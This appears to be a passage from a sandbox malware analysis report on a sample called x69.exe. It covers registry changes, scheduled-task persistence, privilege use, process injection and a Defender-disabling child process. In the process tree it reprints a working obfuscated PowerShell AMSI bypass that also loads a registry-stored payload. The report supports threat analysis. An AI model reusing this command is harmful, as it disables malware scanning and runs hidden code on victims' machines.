Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- = 6438fd7b3dc9db01 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d35f678c-1556-4b5b- = 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 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf51f3bd-3a04-461f- RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d19a1226-0174-486e- RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bda18bd-8e1b-49b3- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b5878b52-19ce-4791- = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eef5bb6d-1f3e-469a- 
RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fda03d4-1977-427f- = 9e78b67b3dc9db01 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d35f678c-1556-4b5b- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = ad8e467c3dc9db01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a09bfb26-e7c9-47b0- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\32c1033c1063e73bda331eccb913520fcc27c5e3a6ae46ac9db9daad25815e56" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d35f678c-1556-4b5b- = 830b2b7c3dc9db01 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\dc7a540c510e51f15f1e52344479a09b42aa587b1ea02dfee89b07ab978e1f1e" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- = "8324" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a09bfb26-e7c9-47b0- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- = 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 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eef5bb6d-1f3e-469a- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf51f3bd-3a04-461f- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fda03d4-1977-427f- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fda03d4-1977-427f- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- = "8324" RuntimeBroker.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process
3416 schtasks.exe
928 schtasks.exe
2936 schtasks.exe
5052 schtasks.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process
464 x69.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process
856 powershell.exe
856 powershell.exe
2260 powershell.exe
2260 powershell.exe
2260 powershell.exe
2300 powershell.exe
2300 powershell.exe
2300 powershell.exe
4676 powershell.exe
4676 powershell.exe
3416 powershell.exe
3416 powershell.exe
4676 powershell.exe
3416 powershell.exe
3760 powershell.exe
3760 powershell.exe
5032 powershell.exe
5032 powershell.exe
3760 powershell.exe
5032 powershell.exe
2020 powershell.exe
2020 powershell.exe
2020 powershell.exe
4684 powershell.exe
4684 powershell.exe
4684 powershell.exe
4888 powershell.exe
4888 powershell.exe
4888 powershell.exe
3884 powershell.exe
3884 powershell.exe
3884 powershell.exe
4336 powershell.exe
4336 powershell.exe
4336 powershell.exe
5052 powershell.exe
5052 powershell.exe
5052 powershell.exe
3288 powershell.exe
3288 powershell.exe
3572 powershell.exe
3572 powershell.exe
3572 powershell.exe
3288 powershell.exe
4192 powershell.EXE
4192 powershell.EXE
3512 powershell.exe
3512 powershell.exe
3512 powershell.exe
3344 powershell.exe
3344 powershell.exe
4872 powershell.exe
4872 powershell.exe
3344 powershell.exe
4872 powershell.exe
1896 powershell.exe
1896 powershell.exe
1896 powershell.exe
5084 powershell.exe
5084 powershell.exe
5084 powershell.exe
4348 powershell.EXE
4348 powershell.EXE
2300 powershell.exe
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process
3528 Explorer.EXE
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process
Token: SeDebugPrivilege 2884 x69.exe
Token: SeDebugPrivilege 856 powershell.exe
Token: SeDebugPrivilege 464 x69.exe
Token: SeDebugPrivilege 864 x69.exe
Token: SeDebugPrivilege 2260 powershell.exe
Token: SeDebugPrivilege 2300 powershell.exe
Token: SeDebugPrivilege 3416 powershell.exe
Token: SeDebugPrivilege 4676 powershell.exe
Token: SeDebugPrivilege 3760 powershell.exe
Token: SeDebugPrivilege 5032 powershell.exe
Token: SeDebugPrivilege 2020 powershell.exe
Token: SeDebugPrivilege 4684 powershell.exe
Token: SeDebugPrivilege 4888 powershell.exe
Token: SeDebugPrivilege 3884 powershell.exe
Token: SeDebugPrivilege 4336 powershell.exe
Token: SeDebugPrivilege 5052 powershell.exe
Token: SeDebugPrivilege 3288 powershell.exe
Token: SeDebugPrivilege 3572 powershell.exe
Token: SeDebugPrivilege 4192 powershell.EXE
Token: SeDebugPrivilege 3512 powershell.exe
Token: SeDebugPrivilege 3344 powershell.exe
Token: SeDebugPrivilege 4872 powershell.exe
Token: SeDebugPrivilege 1896 powershell.exe
Token: SeDebugPrivilege 464 x69.exe
Token: SeDebugPrivilege 5084 powershell.exe
Token: SeDebugPrivilege 4348 powershell.EXE
Token: SeDebugPrivilege 2300 powershell.exe
Token: SeDebugPrivilege 2268 powershell.exe
Token: SeDebugPrivilege 3736 powershell.exe
Token: SeDebugPrivilege 4980 powershell.exe
Token: SeDebugPrivilege 2868 powershell.exe
Token: SeDebugPrivilege 5032 powershell.exe
Token: SeDebugPrivilege 5052 powershell.exe
Token: SeDebugPrivilege 3424 powershell.exe
Token: SeDebugPrivilege 4268 powershell.exe
Token: SeDebugPrivilege 3832 powershell.exe
Token: SeDebugPrivilege 3572 powershell.exe
Token: SeDebugPrivilege 1520 powershell.exe
Token: SeDebugPrivilege 4684 powershell.exe
Token: SeDebugPrivilege 2292 powershell.exe
Token: SeDebugPrivilege 1928 powershell.exe
Token: SeDebugPrivilege 964 powershell.exe
Token: SeDebugPrivilege 4676 powershell.exe
Token: SeDebugPrivilege 3564 powershell.exe
Token: SeDebugPrivilege 4896 powershell.exe
Token: SeDebugPrivilege 1520 powershell.exe
Token: SeDebugPrivilege 2868 powershell.exe
Token: SeDebugPrivilege 4896 powershell.exe
Token: SeDebugPrivilege 4192 powershell.EXE
Token: SeDebugPrivilege 4348 powershell.EXE
Token: SeDebugPrivilege 6124 dllhost.exe
Token: SeDebugPrivilege 2636 dllhost.exe
Token: SeAuditPrivilege 2704 svchost.exe
Token: SeAssignPrimaryTokenPrivilege 2172 svchost.exe
Token: SeIncreaseQuotaPrivilege 2172 svchost.exe
Token: SeSecurityPrivilege 2172 svchost.exe
Token: SeTakeOwnershipPrivilege 2172 svchost.exe
Token: SeLoadDriverPrivilege 2172 svchost.exe
Token: SeSystemtimePrivilege 2172 svchost.exe
Token: SeBackupPrivilege 2172 svchost.exe
Token: SeRestorePrivilege 2172 svchost.exe
Token: SeShutdownPrivilege 2172 svchost.exe
Token: SeSystemEnvironmentPrivilege 2172 svchost.exe
Token: SeUndockPrivilege 2172 svchost.exe
-
Suspicious use of UnmapMainImage 2 IoCs
pid Process
4024 RuntimeBroker.exe
3528 Explorer.EXE
-
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target
PID 2884 wrote to memory of 856 2884 x69.exe 98
PID 2884 wrote to memory of 856 2884 x69.exe 98
PID 2884 wrote to memory of 3416 2884 x69.exe 101
PID 2884 wrote to memory of 3416 2884 x69.exe 101
PID 1004 wrote to memory of 464 1004 cmd.exe 105
PID 1004 wrote to memory of 464 1004 cmd.exe 105
PID 2884 wrote to memory of 864 2884 x69.exe 106
PID 2884 wrote to memory of 864 2884 x69.exe 106
PID 2884 wrote to memory of 2260 2884 x69.exe 107
PID 2884 wrote to memory of 2260 2884 x69.exe 107
PID 2884 wrote to memory of 928 2884 x69.exe 109
PID 2884 wrote to memory of 928 2884 x69.exe 109
PID 2884 wrote to memory of 1848 2884 x69.exe 113
PID 2884 wrote to memory of 1848 2884 x69.exe 113
PID 2884 wrote to memory of 1848 2884 x69.exe 113
PID 2884 wrote to memory of 2300 2884 x69.exe 114
PID 2884 wrote to memory of 2300 2884 x69.exe 114
PID 780 wrote to memory of 2988 780 cmd.exe 116
PID 780 wrote to memory of 2988 780 cmd.exe 116
PID 780 wrote to memory of 2988 780 cmd.exe 116
PID 2988 wrote to memory of 4940 2988 x69Disable-winDefender.exe 117
PID 2988 wrote to memory of 4940 2988 x69Disable-winDefender.exe 117
PID 2988 wrote to memory of 4940 2988 x69Disable-winDefender.exe 117
PID 1848 wrote to memory of 1048 1848 x69Disable-winDefender.exe 118
PID 1848 wrote to memory of 1048 1848 x69Disable-winDefender.exe 118
PID 1848 wrote to memory of 1048 1848 x69Disable-winDefender.exe 118
PID 2988 wrote to memory of 2228 2988 x69Disable-winDefender.exe 119
PID 2988 wrote to memory of 2228 2988 x69Disable-winDefender.exe 119
PID 1848 wrote to memory of 4916 1848 x69Disable-winDefender.exe 120
PID 1848 wrote to memory of 4916 1848 x69Disable-winDefender.exe 120
PID 4916 wrote to memory of 3416 4916 cmd.exe 124
PID 4916 wrote to memory of 3416 4916 cmd.exe 124
PID 2228 wrote to memory of 4676 2228 cmd.exe 125
PID 2228 wrote to memory of 4676 2228 cmd.exe 125
PID 2884 wrote to memory of 2936 2884 x69.exe 126
PID 2884 wrote to memory of 2936 2884 x69.exe 126
PID 2884 wrote to memory of 2524 2884 x69.exe 130
PID 2884 wrote to memory of 2524 2884 x69.exe 130
PID 2884 wrote to memory of 2524 2884 x69.exe 130
PID 2524 wrote to memory of 2956 2524 x69install.exe 132
PID 2524 wrote to memory of 2956 2524 x69install.exe 132
PID 2524 wrote to memory of 2956 2524 x69install.exe 132
PID 2228 wrote to memory of 5032 2228 cmd.exe 165
PID 2228 wrote to memory of 5032 2228 cmd.exe 165
PID 4916 wrote to memory of 3760 4916 cmd.exe 134
PID 4916 wrote to memory of 3760 4916 cmd.exe 134
PID 2456 wrote to memory of 3764 2456 cmd.exe 135
PID 2456 wrote to memory of 3764 2456 cmd.exe 135
PID 2456 wrote to memory of 3764 2456 cmd.exe 135
PID 4916 wrote to memory of 2020 4916 cmd.exe 140
PID 4916 wrote to memory of 2020 4916 cmd.exe 140
PID 2228 wrote to memory of 4684 2228 cmd.exe 172
PID 2228 wrote to memory of 4684 2228 cmd.exe 172
PID 4916 wrote to memory of 4888 4916 cmd.exe 142
PID 4916 wrote to memory of 4888 4916 cmd.exe 142
PID 2228 wrote to memory of 3884 2228 cmd.exe 151
PID 2228 wrote to memory of 3884 2228 cmd.exe 151
PID 464 wrote to memory of 4336 464 x69.exe 144
PID 464 wrote to memory of 4336 464 x69.exe 144
PID 464 wrote to memory of 3572 464 x69.exe 170
PID 464 wrote to memory of 3572 464 x69.exe 170
PID 4916 wrote to memory of 5052 4916 cmd.exe 166
PID 4916 wrote to memory of 5052 4916 cmd.exe 166
PID 2228 wrote to memory of 3288 2228 cmd.exe 149
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (process tree; each entry is "PID | image path | command line", nested by parent, with the signatures raised by that process on the line below it)

- PID 616 | C:\Windows\system32\winlogon.exe | winlogon.exe
  - PID 316 | C:\Windows\system32\dwm.exe | "dwm.exe"
  - PID 6124 | C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{56e19c1a-5867-4201-a1b5-6d367e23986d}
      signatures: Suspicious use of AdjustPrivilegeToken
  - PID 2636 | C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{6c35e491-12b1-4996-a784-e152c28f1a1b}
      signatures: Suspicious use of AdjustPrivilegeToken
- PID 672 | C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe
- PID 956 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
- PID 516 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
- PID 64 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
- PID 1040 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
- PID 1052 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
- PID 1184 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
- PID 1192 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
    signatures: Drops file in System32 directory
  - PID 2544 | C:\Windows\system32\taskhostw.exe | taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (child of PID 1192, the Schedule service host; its full obfuscated command line is reproduced verbatim on the lines that follow, with its signatures and PID after it)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gwjpPDXdjkay{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EGyTRphnVKuFwK,[Parameter(Position=1)][Type]$SZhzBExtBK)$anWgFXQPnMo=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'lec'+'t'+''+'e'+'d'+[Char](68)+''+'e'+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'Me'+'m'+''+'o'+'r'+'y'+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+'a'+'t'+''+'e'+''+[Char](84)+''+[Char](121)+'pe','C'+'l'+'ass,'+[Char](80)+''+'u'+''+[Char](98)+'l'+'i'+'c,'+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+'d'+''+','+'A'+'n'+''+'s'+'i'+'C'+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+'a'+'s'+'s'+'',[MulticastDelegate]);$anWgFXQPnMo.DefineConstructor('R'+[Char](84)+''+'S'+'p'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+'m'+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+'i'+'g'+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$EGyTRphnVKuFwK).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+',M'+'a'+''+[Char](110)+''+[Char](97)+''+'g'+''+'e'+''+'d'+'');$anWgFXQPnMo.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+[Char](98)+'li'+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+'eB'+[Char](121)+'S'+[Char](105)+'g,'+'N'+''+'e'+''+[Char](119)+''+[Char](83)+''+'l'+''+'o'+''+'t'+''+[Char](44)+''+'V'+''+[Ch
ar](105)+'r'+'t'+''+[Char](117)+'a'+[Char](108)+'',$SZhzBExtBK,$EGyTRphnVKuFwK).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+'ed');Write-Output $anWgFXQPnMo.CreateType();}$QVErDwZqdeeSw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+'t'+''+'e'+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+'ro'+'s'+''+[Char](111)+''+[Char](102)+''+'t'+''+'.'+''+'W'+'i'+[Char](110)+'3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+'at'+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+'t'+''+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$ASWRkXIrmAKEjJ=$QVErDwZqdeeSw.GetMethod('G'+'e'+''+[Char](116)+''+'P'+''+'r'+'o'+'c'+''+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c'+','+''+'S'+''+'t'+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lkbVUXvgrIsctGOmmOe=gwjpPDXdjkay @([String])([IntPtr]);$mAfbTdbxxfDadunDNGCeia=gwjpPDXdjkay 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$fEOFZTTGPJH=$QVErDwZqdeeSw.GetMethod(''+[Char](71)+''+[Char](101)+'tM'+[Char](111)+''+[Char](100)+''+'u'+''+'l'+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+'2'+'.'+[Char](100)+'ll')));$ReZDSaRdXaeEhN=$ASWRkXIrmAKEjJ.Invoke($Null,@([Object]$fEOFZTTGPJH,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'br'+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$EOeVtdgxRABKatLMa=$ASWRkXIrmAKEjJ.Invoke($Null,@([Object]$fEOFZTTGPJH,[Object](''+[Char](86)+'i'+[Char](114)+'t'+'u'+'alPr'+'o'+'t'+[Char](101)+''+[Char](99)+''+'t'+'')));$nMDYmQs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ReZDSaRdXaeEhN,$lkbVUXvgrIsctGOmmOe).Invoke('a'+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$fzaAOoamoSPhzDgTe=$ASWRkXIrmAKEjJ.Invoke($Null,@([Object]$nMDYmQs,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+'i'+''+'S'+''+'c'+''+'a'+''+'n'+''+[Char](66)+'u'+'f'+'f'+[Char](101)+''+[Char](114)+'')));$Ivpcqfqpxz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EOeVtdgxRABKatLMa,$mAfbTdbxxfDadunDNGCeia).Invoke($fzaAOoamoSPhzDgTe,[uint32]8,4,[ref]$Ivpcqfqpxz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fzaAOoamoSPhzDgTe,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EOeVtdgxRABKatLMa,$mAfbTdbxxfDadunDNGCeia).Invoke($fzaAOoamoSPhzDgTe,[uint32]8,0x20,[ref]$Ivpcqfqpxz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+'WA'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](120)+''+'6'+''+[Char](57)+''+[Char](115)+'tag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
      signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Command and Scripting Interpreter: PowerShell; Drops file in System32 directory; Suspicious use of SetThreadContext; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      PID: 4348
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (second instance, also a child of PID 1192; its full obfuscated command line is reproduced verbatim on the lines that follow, with its signatures and PID after it)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:wndeDcOuxJyW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cqOPlRudTeSnnN,[Parameter(Position=1)][Type]$aBdREcctId)$KLyzITCmmIs=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object 